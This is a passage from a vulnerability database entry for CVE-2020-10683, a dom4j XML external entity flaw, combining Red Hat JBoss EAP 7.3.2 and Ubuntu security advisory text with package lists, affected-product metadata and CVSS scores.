eap7-jboss-genericjms-2.0.6-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP04_redhat_00001.1.el6eap.noarch.rpm eap7-jboss-logmanager-2.1.15-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-jboss-server-migration-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-cli-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-core-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap6.4-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap6.4-to-eap7.3-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.1-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.2-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.2-to-eap7.3-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-eap7.3-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly10.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly10.1-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly11.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly12.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly13.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly14.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly15.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly16.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly17.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly18.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly8.2-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-server-migration-wildfly9.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm eap7-jboss-xnio-base-3.7.8-1.SP1_redhat_00001.1.el6eap.noarch.rpm eap7-netty-4.1.48-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-netty-all-4.1.48-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-undertow-2.0.30-4.SP4_redhat_00001.1.el6eap.noarch.rpm eap7-undertow-server-1.6.2-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm eap7-wildfly-common-1.5.2-1.Final_redhat_00002.1.el6eap.noarch.rpm eap7-wildfly-elytron-1.10.7-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-elytron-tool-1.10.7-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-http-client-common-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-http-ejb-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-http-naming-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-http-transaction-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-wildfly-javadocs-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm eap7-wildfly-modules-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2019-14900 https://access.redhat.com/security/cve/CVE-2020-1710 https://access.redhat.com/security/cve/CVE-2020-1748 https://access.redhat.com/security/cve/CVE-2020-10672 https://access.redhat.com/security/cve/CVE-2020-10673 https://access.redhat.com/security/cve/CVE-2020-10683 https://access.redhat.com/security/cve/CVE-2020-10687 https://access.redhat.com/security/cve/CVE-2020-10693 https://access.redhat.com/security/cve/CVE-2020-10714 https://access.redhat.com/security/cve/CVE-2020-10718 https://access.redhat.com/security/cve/CVE-2020-10740 https://access.redhat.com/security/cve/CVE-2020-14297 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/ https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/html-single/installation_guide/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXzqIS9zjgjWX9erEAQjYNxAAk4rojlcRbfjwu0wlWLTU1MbxQNclVtVh MpQnFzyvJVVXX0lslx7NGxHlRNWRgqI/XC1QDqlHpRs4du5/a2Uj+8c5u+WPQefF QCqOvSntbMli42/I7+fCehLVofx/HkuAVcBoGrIGby1E4rddDljh4bH3r43I7wa5 HN9ki8uFAy8bIAzfXW+RB4rxtnsAABv/VFoH1fWmrXCXE6A6aG+AU86ddty0JQHN JhQp6v/X/3ccCvHYTAO8vlbqIJ4fE86e1+5oRBor+4ZD4mMVzGKm4cf8CMPXsKIB 9dFGo8WHFBgEi4hBbBFtFfaE2DGZ6K4Q7X0IAhiiYJmpPg8NgzGiqVvOAG+/OrBz DE84ZPxZwS1zR82wwIyHP4W5mYIhQTxhtp+E9Klu4gpFIAmK8bVfGf2Ub0HOCS6z sbN1Eiv0SBfWRHBfBkuRTBd0aEcmGRNl4GSXzXtanTf0OhFk/4pxdJPmKDEBFWvg 3dtwFi7+/8JoAch8GKQCo4UoSo6etQu45sUH6Q8ozuxYA72+J9K7cpwp/fVhiYRT nruC+2HDuugrC8UVJ/24E++49omdSXAm+UR9tvkFdVU3IpXLJNWO8s4QbrGC7CN7 Lvg/ukygGhrEEyQ1J9yYSeeNISQWJGOSKj/bgYRAh/AbX/QcZZfus7ppAasNjndn Bk4PSTq9yaw= =ZNiG -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Summary:
This is a security update for JBoss EAP Continuous Delivery 20.
The References section of this erratum contains a download link (you must log in to download the update).
The JBoss server process must be restarted for the update to take effect
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-202005-1054", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "jdeveloper", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "insurance rules palette", scope: "lte", trust: 1, vendor: "oracle", version: "11.3.0", }, { model: "dom4j", scope: "lt", trust: 1, vendor: "dom4j", version: "2.0.3", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "14.0.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "gte", trust: 1, vendor: "oracle", version: "19.12.0.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "gte", trust: 1, vendor: "oracle", version: "17.1.0.0", }, { model: "retail xstore point of service", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.6", }, { model: "enterprise data quality", scope: "eq", trust: 1, vendor: "oracle", version: "11.1.1.9.0", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "flexcube core banking", scope: "eq", trust: 1, vendor: "oracle", version: "11.8.0", }, { model: "insurance policy administration j2ee", scope: "gte", trust: 1, vendor: "oracle", version: "11.1.0", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3.0", }, { model: "webcenter portal", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "communications unified inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "7.3.0", }, { model: "webcenter portal", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "snapmanager", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "insurance policy administration j2ee", scope: "eq", trust: 1, vendor: "oracle", version: "11.0.2", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 1, vendor: "oracle", version: "16.0", }, { model: "utilities framework", scope: "gte", trust: 1, vendor: "oracle", version: "4.3.0.1.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "lte", trust: 1, vendor: "oracle", version: "17.12.17.1", }, { model: "snapcenter", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "15.0", }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "18.0", }, { model: "insurance policy administration j2ee", scope: "lte", trust: 1, vendor: "oracle", version: "11.3.0", }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "19.0", }, { model: "enterprise data quality", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "endeca information discovery integrator", scope: "eq", trust: 1, vendor: "oracle", version: "3.2.0", }, { model: "oncommand workflow automation", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "primavera p6 enterprise project portfolio management", scope: "lte", trust: 1, vendor: "oracle", version: "16.2.20.1", }, { model: "dom4j", scope: "lt", trust: 1, vendor: "dom4j", version: "2.1.3", }, { model: "business process management suite", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "business process management suite", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "lte", trust: 1, vendor: "oracle", version: "19.12.6.0", }, { model: "health sciences information manager", scope: "eq", trust: 1, vendor: "oracle", version: "3.0.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "lte", trust: 1, vendor: "oracle", version: "18.8.19.0", }, { model: "insurance rules palette", scope: "eq", trust: 1, vendor: "oracle", version: "11.0.2", }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "16.0", }, { model: "agile plm", scope: "eq", trust: 1, vendor: "oracle", version: "9.3.5", }, { model: "retail xstore point of service", scope: "eq", trust: 1, vendor: "oracle", version: "18.0.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "gte", trust: 1, vendor: "oracle", version: "16.1.0.0", }, { model: "retail xstore point of service", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.4", }, { model: "rapid planning", scope: "eq", trust: 1, vendor: "oracle", version: "12.1", }, { model: "communications diameter signaling router", scope: "lte", trust: 1, vendor: "oracle", version: "8.2.2", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.3.0", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.4.0.0.0", }, { model: "webcenter portal", scope: "eq", trust: 1, vendor: "oracle", version: "11.1.1.9.0", }, { model: "communications diameter signaling router", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0", }, { model: "oncommand api services", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "communications unified inventory management", scope: "eq", trust: 1, vendor: "oracle", version: "7.4.0", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "15.0", }, { model: "agile plm", scope: "eq", trust: 1, vendor: "oracle", version: "9.3.3", }, { model: "health sciences empirica signal", scope: "eq", trust: 1, vendor: "oracle", version: "9.0", }, { model: "retail order broker", scope: "eq", trust: 1, vendor: "oracle", version: "19.1", }, { model: "banking platform", scope: "lte", trust: 1, vendor: "oracle", version: "2.10.0", }, { model: "data integrator", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "storagetek tape analytics sw tool", scope: "eq", trust: 1, vendor: "oracle", version: "2.3", }, { model: "documaker", scope: "lte", trust: 1, vendor: "oracle", version: "12.6.4", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 1, vendor: "oracle", version: "10.2.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "gte", trust: 1, vendor: "oracle", version: "18.1.0.0", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "snap creator framework", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "rapid planning", scope: "eq", trust: 1, vendor: "oracle", version: "12.2", }, { model: "utilities framework", scope: "lte", trust: 1, vendor: "oracle", version: "4.3.0.6.0", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "16.0", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "2.2.0.0.0", }, { model: "insurance rules palette", scope: "eq", trust: 1, vendor: "oracle", version: "10.2.0", }, { model: "retail xstore point of service", scope: "eq", trust: 1, vendor: "oracle", version: "17.0.4", }, { model: "flexcube core banking", scope: "eq", trust: 1, vendor: "oracle", version: "11.10.0", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 1, vendor: "oracle", version: "17.0", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.2.0.3.0", }, { model: "dom4j", scope: "gte", trust: 1, vendor: "dom4j", version: "2.1.0", }, { model: "communications application session controller", scope: "eq", trust: 1, vendor: "oracle", version: "3.9m0p1", }, { model: "enterprise manager base platform", scope: "eq", trust: 1, vendor: "oracle", version: "13.4.0.0", }, { model: "fusion middleware", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "utilities framework", scope: "eq", trust: 1, vendor: "oracle", version: "4.4.0.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 1, vendor: "oracle", version: "10.2.4", }, { model: "retail price management", scope: "eq", trust: 1, vendor: "oracle", version: "16.0.3.0", }, { model: "application testing suite", scope: "eq", trust: 1, vendor: "oracle", version: "13.3.0.1", }, { model: "ubuntu linux", scope: "eq", trust: 1, vendor: "canonical", version: "16.04", }, { model: "flexcube core banking", scope: "eq", trust: 1, vendor: "oracle", version: "11.7.0", }, { model: "insurance rules palette", scope: "gte", trust: 1, vendor: "oracle", version: "11.1.0", }, { model: "flexcube core banking", scope: "eq", trust: 1, vendor: "oracle", version: "11.9.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 1, vendor: "oracle", version: "10.2.0", }, { model: "documaker", scope: "gte", trust: 1, vendor: "oracle", version: "12.6.0", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 1, vendor: "oracle", version: "18.0", }, { model: "banking platform", scope: "gte", trust: 1, vendor: "oracle", version: "2.4.0", }, { model: "leap", scope: "eq", trust: 1, vendor: "opensuse", version: "15.1", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 1, vendor: "oracle", version: "19.0", }, { model: "data integrator", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, ], sources: [ { db: "NVD", id: "CVE-2020-10683", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Red Hat", sources: [ { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, { db: "CNNVD", id: "CNNVD-202004-1133", }, ], trust: 1.3, }, cve: "CVE-2020-10683", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2020-10683", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "VHN-163186", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", exploitabilityScore: 3.9, id: "CVE-2020-10683", impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1, userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2020-10683", trust: 1, value: "CRITICAL", }, { author: "CNNVD", id: "CNNVD-202004-1133", trust: 0.6, value: "CRITICAL", }, { author: "VULHUB", id: "VHN-163186", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-163186", }, { db: "CNNVD", id: "CNNVD-202004-1133", }, { db: "NVD", id: "CVE-2020-10683", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j. dom4j is an open source framework for processing XML. A code issue vulnerability exists in dom4j versions prior to 2.0.3 and 2.1.x versions prior to 2.1.3. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products. ==========================================================================\nUbuntu Security Notice USN-4575-1\nOctober 13, 2020\n\ndom4j vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n\nSummary:\n\ndom4j could be made to expose sensitive information or run programs if it\nreceived specially crafted input. \n\nSoftware Description:\n- dom4j: Flexible XML framework for Java\n\nDetails:\n\nIt was discovered that dom4j incorrectly handled reading XML data. A\nremote attacker could exploit this with a crafted XML file to expose\nsensitive data or possibly execute arbitrary code. (CVE-2020-10683)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libdom4j-java 1.6.1+dfsg.3-2ubuntu1.1\n\nIn general, a standard system update will make all the necessary changes. Description:\n\nRed Hat Process Automation Manager is an open source business process\nmanagement suite that combines process management and decision service\nmanagement and enables business and IT users to create, manage, validate,\nand deploy process applications and decision services. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat JBoss Enterprise Application Platform 7.3.2 security update\nAdvisory ID: RHSA-2020:3461-01\nProduct: Red Hat JBoss Enterprise Application Platform\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:3461\nIssue date: 2020-08-17\nCVE Names: CVE-2019-14900 CVE-2020-1710 CVE-2020-1748 \n CVE-2020-10672 CVE-2020-10673 CVE-2020-10683 \n CVE-2020-10687 CVE-2020-10693 CVE-2020-10714 \n CVE-2020-10718 CVE-2020-10740 CVE-2020-14297 \n=====================================================================\n\n1. Summary:\n\nAn update is now available for Red Hat JBoss Enterprise Application\nPlatform 7.3 for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss EAP 7.3 for RHEL 6 Server - noarch\n\n3. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. \n\nThis release of Red Hat JBoss Enterprise Application Platform 7.3.2 serves\nas a replacement for Red Hat JBoss Enterprise Application Platform 7.3.1,\nand includes bug fixes and enhancements. See the Red Hat JBoss Enterprise\nApplication Platform 7.3.2 Release Notes for information about the most\nsignificant bug fixes and enhancements included in this release. \n\nSecurity Fix(es):\n\n* wildfly: exposed setting of TCCL via the EmbeddedManagedProcess API\n(CVE-2020-10718)\n\n* dom4j: XML External Entity vulnerability in default SAX parser\n(CVE-2020-10683)\n\n* wildfly-elytron: session fixation when using FORM authentication\n(CVE-2020-10714)\n\n* wildfly-undertow: Undertow: Incomplete fix for CVE-2017-2666 due to\npermitting invalid characters in HTTP requests (CVE-2020-10687)\n\n* jackson-databind: mishandles the interaction between serialization\ngadgets and typing which could result in remote command execution\n(CVE-2020-10673)\n\n* hibernate-core: hibernate: SQL injection issue in Hibernate ORM\n(CVE-2019-14900)\n\n* wildfly: unsafe deserialization in Wildfly Enterprise Java Beans\n(CVE-2020-10740)\n\n* jackson-databind: mishandles the interaction between serialization\ngadgets and typing which could result in remote command execution\n(CVE-2020-10672)\n\n* undertow: EAP: field-name is not parsed in accordance to RFC7230\n(CVE-2020-1710)\n\n* hibernate-validator: Improper input validation in the interpolation of\nconstraint error messages (CVE-2020-10693)\n\n* wildfly: Improper authorization issue in WildFlySecurityManager when\nusing alternative protection domain (CVE-2020-1748)\n\n* wildfly: Some EJB transaction objects may get accumulated causing Denial\nof Service (CVE-2020-14297)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, see the CVE page(s) listed in the\nReferences section. \n\n4. Solution:\n\nBefore applying this update, ensure all previously released errata relevant\nto your system have been applied. \n\nFor details about how to apply this update, see:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1666499 - CVE-2019-14900 hibernate: SQL injection issue in Hibernate ORM\n1694235 - CVE-2020-10683 dom4j: XML External Entity vulnerability in default SAX parser\n1785049 - CVE-2020-10687 Undertow: Incomplete fix for CVE-2017-2666 due to permitting invalid characters in HTTP requests\n1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230\n1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages\n1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain\n1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication\n1828476 - CVE-2020-10718 wildfly: exposed setting of TCCL via the EmbeddedManagedProcess API\n1834512 - CVE-2020-10740 wildfly: unsafe deserialization in Wildfly Enterprise Java Beans\n1853595 - CVE-2020-14297 wildfly: Some EJB transaction objects may get accumulated causing Denial of Service\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-18793 - [GSS](7.3.z) Upgrade Hibernate ORM from 5.3.16 to 5.3.17\nJBEAP-19095 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.20 to 1.0.21\nJBEAP-19134 - (7.3.z) Upgrade HAL from 3.2.8.Final-redhat-00001 to 3.2.9.Final\nJBEAP-19185 - (7.3.z) Upgrade IronJacamar from 1.4.20.Final to 1.4.22.Final\nJBEAP-19203 - (7.3.z) WFCORE-4850 - Updating mockserver to 5.9.0. Exclusion of dependency from xom.io7m\nJBEAP-19205 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.x\nJBEAP-19269 - [GSS](7.3.z) Upgrade jboss-logmanager from 2.1.14.Final to 2.1.15.Final\nJBEAP-19322 - (7.3.z) Upgrade XNIO from 3.7.7 to 3.7.8.SP1\nJBEAP-19325 - (7.3.z) Upgrade Infinispan from 9.4.18.Final-redhat-00001 to 9.4.19.Final-redhat-00001\nJBEAP-19397 - (7.3.z) Upgrade JSF based on Mojarra 2.3.9.SP09-redhat-00001 to 2.3.9.SP11-redhat-00001\nJBEAP-19409 - Tracker bug for the EAP 7.3.2 release for RHEL-6\nJBEAP-19529 - (7.3.z) Update PR template to include PR-processor hints. \nJBEAP-19564 - [GSS](7.3.z) Upgrade jboss-ejb-client from 4.0.31.Final-redhat-00001 to 4.0.33.Final-redhat-00001\nJBEAP-19585 - [GSS](7.3.z) Upgrade org.jboss.genericjms from 2.0.4 to 2.0.6\nJBEAP-19617 - (7.3.z) Upgrade wildfly-naming-client from 1.0.12.Final-redhat-00001 to 1.0.13.Final-redhat-00001\nJBEAP-19619 - (7.3.z) Upgrade JBoss JSF API from 3.0.0.SP02-redhat-00001 to 3.0.0.SP04-redhat-00001\nJBEAP-19673 - (7.3.z) [WFCORE] Upgrade WildFly Common to 1.5.2.Final\nJBEAP-19674 - (7.3.z) [WFCORE] Upgrade galleon and wildfly-galleon-plugins from 4.1.2.Final to 4.2.4.Final\nJBEAP-19874 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.21.Final-redhat-00001 to 1.0.22.Final-redhat-00001\n\n7. Package List:\n\nRed Hat JBoss EAP 7.3 for RHEL 6 Server:\n\nSource:\neap7-dom4j-2.1.3-1.redhat_00001.1.el6eap.src.rpm\neap7-elytron-web-1.6.2-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-glassfish-jsf-2.3.9-11.SP11_redhat_00001.1.el6eap.src.rpm\neap7-hal-console-3.2.9-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-hibernate-5.3.17-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-hibernate-validator-6.0.20-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-infinispan-9.4.19-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-ironjacamar-1.4.22-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-jackson-annotations-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-core-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-databind-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-jaxrs-providers-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-modules-base-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jackson-modules-java8-2.10.4-1.redhat_00001.1.el6eap.src.rpm\neap7-jboss-genericjms-2.0.6-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP04_redhat_00001.1.el6eap.src.rpm\neap7-jboss-logmanager-2.1.15-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-jboss-server-migration-1.7.1-7.Final_redhat_00009.1.el6eap.src.rpm\neap7-jboss-xnio-base-3.7.8-1.SP1_redhat_00001.1.el6eap.src.rpm\neap7-netty-4.1.48-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-undertow-2.0.30-4.SP4_redhat_00001.1.el6eap.src.rpm\neap7-wildfly-7.3.2-4.GA_redhat_00002.1.el6eap.src.rpm\neap7-wildfly-common-1.5.2-1.Final_redhat_00002.1.el6eap.src.rpm\neap7-wildfly-elytron-1.10.7-1.Final_redhat_00001.1.el6eap.src.rpm\neap7-wildfly-http-client-1.0.22-1.Final_redhat_00001.1.el6eap.src.rpm\n\nnoarch:\neap7-dom4j-2.1.3-1.redhat_00001.1.el6eap.noarch.rpm\neap7-glassfish-jsf-2.3.9-11.SP11_redhat